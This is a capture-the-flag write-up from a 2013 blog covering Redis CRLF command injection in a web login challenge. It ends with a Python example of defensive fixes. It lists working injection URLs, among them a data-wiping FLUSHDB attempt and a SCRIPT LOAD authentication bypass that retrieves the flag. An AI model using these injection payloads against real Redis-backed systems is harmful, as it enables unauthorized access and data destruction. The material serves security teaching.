Sunday, August 4, 2013

ebCTF@OHM2013 Web200

Web200
http://54.217.3.87:5000/

It is a login interface backed by a NoSQL database. Try with test/test:
http://54.217.3.87:5000/?action=login&username=test&password=test
Response:
User not found

Nice response. Then try a classic SQLi payload:
http://54.217.3.87:5000/?action=login&username=test%27+or+%27z%27%3D%27z&password=test
Response:
Our open source, BSD licensed, advanced key-value store returned an error: -ERR wrong number of arguments for 'get' command

Weird error message. Search for "open source, BSD licensed, advanced key-value store" and you will get "Redis", which is a NoSQL database. The nice thing about Redis's website is that you can test the commands there:
http://redis.io/commands/get

Search for "wrong number of arguments for 'get' command" and you will get the clue that the GET command takes exactly one argument.
The space character rocks. So how can we inject another query or do a subquery?
If we put a line break (%0d%0a), it starts a new line, and therefore a new command, say GET admin:
http://54.217.3.87:5000/?action=login&username=test%0d%0aGET%20admin&password=test
Response:
User not found

No error message, but user not found. So there is no admin.
If we try other commands, like EXISTS something:
http://54.217.3.87:5000/?action=login&username=test%0d%0aEXISTS%20admin&password=test
Response:
User found however the SHA-1 hash in the database does not match the SHA-1 hash of the password you provided.

From the message, I guess the query retrieves the password's SHA-1 hash using the username as the key.
Using EXISTS someweirdkey should return 0, and maybe we can try this:
http://54.217.3.87:5000/?action=login&username=0%0d%0aEXISTS%20someweirdkey&password=0
Response:
User found however the SHA-1 hash in the database does not match the SHA-1 hash of the password you provided.
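Why a line break behaves like that, and how a defender closes it, as an added example (my own constructed code, not the challenge's source, which is not published here): Redis's inline protocol is newline-terminated and whitespace-tokenized, so building a command by string concatenation lets CR/LF in the username start a second command. RESP array framing length-prefixes every argument, so the same bytes stay inside one argument, and an allow-list on the username keeps them out of the datastore entirely. The `login` function, the `USERNAME_RE` pattern and the sample store are assumptions that mirror the responses seen above, not the server's real code.

```python
from __future__ import annotations

import hashlib
import hmac
import re

# Constructed illustration of the inferred login flow and of two Redis wire
# encodings. The username allow-list below is my choice, not the challenge's.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.@-]{1,64}")


def build_inline_command(username: str) -> bytes:
    """Unsafe: formats a GET as an inline Redis command.

    Inline commands are newline-terminated and whitespace-tokenized, so any
    CR/LF or space inside `username` changes the command structure.
    """
    return f"GET {username}\r\n".encode()


def split_inline_commands(payload: bytes) -> list[list[str]]:
    """Tokenize bytes the way a Redis server reads the inline protocol:
    one command per line, arguments separated by whitespace."""
    return [line.split() for line in payload.decode().split("\r\n") if line.strip()]


def encode_resp_array(*args: str) -> bytes:
    """Safe framing: RESP multi-bulk. Each argument is length-prefixed, so
    bytes such as CR/LF inside an argument are data, never a boundary."""
    parts = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        parts.append(f"${len(raw)}\r\n".encode() + raw + b"\r\n")
    return b"".join(parts)


def decode_resp_array(payload: bytes) -> list[str]:
    """Parse one RESP multi-bulk array back into its arguments, honouring the
    declared lengths instead of searching for separators."""
    if not payload.startswith(b"*"):
        raise ValueError("not a RESP array")
    head_end = payload.index(b"\r\n")
    count = int(payload[1:head_end])
    pos = head_end + 2
    args = []
    for _ in range(count):
        if payload[pos:pos + 1] != b"$":
            raise ValueError("expected bulk string")
        len_end = payload.index(b"\r\n", pos)
        length = int(payload[pos + 1:len_end])
        start = len_end + 2
        args.append(payload[start:start + length].decode())
        pos = start + length + 2
    return args


def login(store: dict[str, str], username: str, password: str) -> str:
    """Hardened version of the inferred login flow: allow-list the username
    before it reaches the datastore, then compare hashes in constant time.
    SHA-1 is kept only to mirror the challenge; real credentials belong in a
    password hash such as scrypt or Argon2."""
    if not USERNAME_RE.fullmatch(username):
        return "Invalid username"
    stored = store.get(username)  # stands in for GET <username>
    if stored is None:
        return "User not found"
    supplied = hashlib.sha1(password.encode()).hexdigest()
    if hmac.compare_digest(stored, supplied):
        return "Login OK"
    return "User found however the SHA-1 hash in the database does not match"


if __name__ == "__main__":
    hostile = "test\r\nEXISTS admin"  # constructed input, as in the writeup
    print(split_inline_commands(build_inline_command(hostile)))  # two commands
    print(decode_resp_array(encode_resp_array("GET", hostile)))  # one argument
    users = {"alice": hashlib.sha1(b"password").hexdigest()}  # constructed store
    print(login(users, "alice", "password"), "|", login(users, hostile, "x"))
```

Any maintained Redis client library already speaks RESP arrays, so the practical fix is simply to pass the username as a separate argument to the client rather than formatting it into a command string; the allow-list is defence in depth.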

It looks like I need to either supply a password whose SHA-1 hash is 0, or find some other way to make the injected command output a value that matches the hash of the password I provide. The former doesn't make sense, so let's try the latter. sha1("password") = 5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8, so we have:
http://54.217.3.87:5000/?action=login&username=admin%0d%0aECHO%205baa61e4c9b93f3f0682250b6cf8331b7ee68fd8&password=password
Response:
Our open source, BSD licensed, advanced key-value store returned an error: -ERR unknown command 'ECHO'

Oh, they blocked ECHO. When you get angry, you may want to try this:
http://54.217.3.87:5000/?action=login&username=test%0d%0aFLUSHDB&password=test
Response:
Our open source, BSD licensed, advanced key-value store returned an error: -READONLY You can't write against a read only slave.

:) Let's continue. If you search "site:redis.io sha command", you will get some funny commands called "SCRIPT LOAD" and "SCRIPT EXISTS".
http://redis.io/commands/script-load
** This command returns the SHA1 digest of the script added into the script cache. **

Wow. This is what we want. And the page for SCRIPT EXISTS gives you an example:
SCRIPT LOAD "return 1"
Now let's try:
http://54.217.3.87:5000/?action=login&username=test%0d%0aSCRIPT%20LOAD%20%22return%201%22&password=return%201
Response:
Our open source, BSD licensed, advanced key-value store returned an error: -ERR Unknown SCRIPT subcommand or wrong # of args.

Oh damn you, the space rocks. How about quoting the script with single quotes:
http://54.217.3.87:5000/?action=login&username=test%0d%0aSCRIPT%20LOAD%20'return%201'&password=return%201
Response:
Our open source, BSD licensed, advanced key-value store returned an error: -ERR Unknown SCRIPT subcommand or wrong # of args.

We need a script that doesn't need a space, so that the whole script is a single argument. SCRIPT LOAD then returns the SHA-1 of the script body, and if the password is that same string, the two hashes match. Finally we have:
http://54.217.3.87:5000/?action=login&username=test%0d%0aSCRIPT%20LOAD%20return&password=return
Response:
Congrats the flag is: ebCTF{de26ceb319c7636f09adf6238e7fd606}


return what?.
